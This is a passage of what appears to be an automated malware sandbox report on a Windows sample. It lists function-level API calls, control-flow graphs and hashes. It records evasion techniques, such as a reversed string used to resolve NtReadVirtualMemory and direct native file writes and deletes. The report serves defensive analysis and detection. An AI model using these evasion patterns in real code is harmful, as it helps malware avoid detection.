                                                                                          • RegQueryValueExA.ADVAPI32(?,02875CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02875B7D,?,80000001), ref: 02875B55
                                                                                          • RegCloseKey.ADVAPI32(?,02875B84,00000000,00000000,00000005,00000000,02875B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875B77
                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02875B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02875BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02875BA7
                                                                                          • lstrlen.KERNEL32(00000000), ref: 02875BD2
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02875C19
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C29
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02875C51
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C61
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C87
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1759228003-3917250287
                                                                                          • Opcode ID: 666b25e4006fc8f95304b964b37a105091906bf27f6b8aea9c2b136e1835e2bb
                                                                                          • Instruction ID: e6e403bec9e94873c8abd5b12b7e319f8760e6cc5c6d54727820e7bc27cac630
                                                                                          • Opcode Fuzzy Hash: 666b25e4006fc8f95304b964b37a105091906bf27f6b8aea9c2b136e1835e2bb
                                                                                          • Instruction Fuzzy Hash: 2751887DE4020C7EFB21D6A8CC46FEFB7AD9B14744F8001A5AA08E6581DB78DA448F61
                                                                                          Function 02888254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02888020: GetModuleHandleA.KERNELBASE(?), ref: 02888072
                                                                                            • Part of subcall function 028880C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0288811B
                                                                                            • Part of subcall function 028880C8: GetProcAddress.KERNEL32(?,?), ref: 0288812D
                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028882C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                          • API String ID: 36784810-737317276
                                                                                          • Opcode ID: 7f45a95dae11b79c32b01ba3432b7fd18d0c1df088634c97ebd00d9188f9b7ec
                                                                                          • Instruction ID: 4f2f0dc025739cf894c3535e508c5a5115a2a060797fb226528126bd7a2500b8
                                                                                          • Opcode Fuzzy Hash: 7f45a95dae11b79c32b01ba3432b7fd18d0c1df088634c97ebd00d9188f9b7ec
                                                                                          • Instruction Fuzzy Hash: 2701297D640208AFEB00EFACE885E9E77FEEB48700F958860F504D7640D678E9148B26
                                                                                          Function 0288DACC Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0288DB0B
                                                                                          • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0288DB72
                                                                                          • NtClose.NTDLL(?), ref: 0288DB7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$CloseFileNameName_Write
                                                                                          • String ID:
                                                                                          • API String ID: 1792072161-0
                                                                                          • Opcode ID: f76890c3717100617989dbc652406035664a5de31fd3727327c5f567cb965eec
                                                                                          • Instruction ID: 53e93bad58c984d095b57d7a173e094901bbd68f9a1b6830c37619296b96f050
                                                                                          • Opcode Fuzzy Hash: f76890c3717100617989dbc652406035664a5de31fd3727327c5f567cb965eec
                                                                                          • Instruction Fuzzy Hash: F421C179A4130CBAEB10EAE4CD46F9EB7BDEB04B14F604461B605F71D0D7B4AE048A56
                                                                                          Function 0288DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlInitUnicodeString.NTDLL ref: 0288DA6C
                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0288DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0288DAA1
                                                                                            • Part of subcall function 02874C0C: SysFreeString.OLEAUT32(?), ref: 02874C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                          • String ID:
                                                                                          • API String ID: 2256775434-0
                                                                                          • Opcode ID: 471cf53e656f75a50fde4933d43ae9d42a3adc43ec3746f2e39a4545dd9a66d6
                                                                                          • Instruction ID: e2e5b2376bcd4b5bbd7c996e18a2478cadd01bb6f07b15dd9936851a36a9b48e
                                                                                          • Opcode Fuzzy Hash: 471cf53e656f75a50fde4933d43ae9d42a3adc43ec3746f2e39a4545dd9a66d6
                                                                                          • Instruction Fuzzy Hash: 2201E17D904208AAEB11FAE4CD51FDEB7BDEB48710F604461A501E2180EB74AB148A65
                                                                                          Function 02871A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 8621 2871a8f-2871a9b 8622 2871aa1-2871aa5 8621->8622 8623 2871b6c-2871b6f 8621->8623 8626 2871aa7-2871aae 8622->8626 8627 2871b08-2871b11 8622->8627 8624 2871b75-2871b7f 8623->8624 8625 2871c5c-2871c60 8623->8625 8628 2871b81-2871b8d 8624->8628 8629 2871b3c-2871b49 8624->8629 8632 2871c66-2871c6b 8625->8632 8633 28716e8-287170b call 2871644 VirtualFree 8625->8633 8630 2871ab0-2871abb 8626->8630 8631 2871adc-2871ade 8626->8631 8627->8626 8634 2871b13-2871b27 Sleep 8627->8634 8638 2871bc4-2871bd2 8628->8638 8639 2871b8f-2871b92 8628->8639 8629->8628 8637 2871b4b-2871b5f Sleep 8629->8637 8640 2871ac4-2871ad9 8630->8640 8641 2871abd-2871ac2 8630->8641 8642 2871af3 8631->8642 8643 2871ae0-2871af1 8631->8643 8649 2871716 8633->8649 8650 287170d-2871714 8633->8650 8634->8626 8636 2871b2d-2871b38 Sleep 8634->8636 8636->8627 8637->8628 8645 2871b61-2871b68 Sleep 8637->8645 8646 2871b96-2871b9a 8638->8646 8648 2871bd4-2871bd9 call 28714c0 8638->8648 8639->8646 8647 2871af6-2871b03 8642->8647 8643->8642 8643->8647 8645->8629 8651 2871bdc-2871be9 8646->8651 8652 2871b9c-2871ba2 8646->8652 8647->8624 8648->8646 8656 2871719-2871723 8649->8656 8650->8656 8651->8652 8655 2871beb-2871bf2 call 28714c0 8651->8655 8657 2871bf4-2871bfe 8652->8657 8658 2871ba4-2871bc2 call 2871500 8652->8658 8655->8652 8660 2871c00-2871c28 VirtualFree 8657->8660 8661 2871c2c-2871c59 call 2871560 8657->8661
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 02871B17
                                                                                          • Sleep.KERNEL32(0000000A,00000000), ref: 02871B31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: bf49bfc4f7cf408bb18ee8d5841a6e4a43dd0bcc257bee1e6779da2dee5dd61f
                                                                                          • Instruction ID: 905de3b46379145f443cd8016960b77549830e3df1a2b53192c66da25c26f7af
                                                                                          • Opcode Fuzzy Hash: bf49bfc4f7cf408bb18ee8d5841a6e4a43dd0bcc257bee1e6779da2dee5dd61f
                                                                                          • Instruction Fuzzy Hash: E651DD7DA102408FEB15CF6CC988766BBD1AB45318F2885AED84CCBAC2E770D445CBA1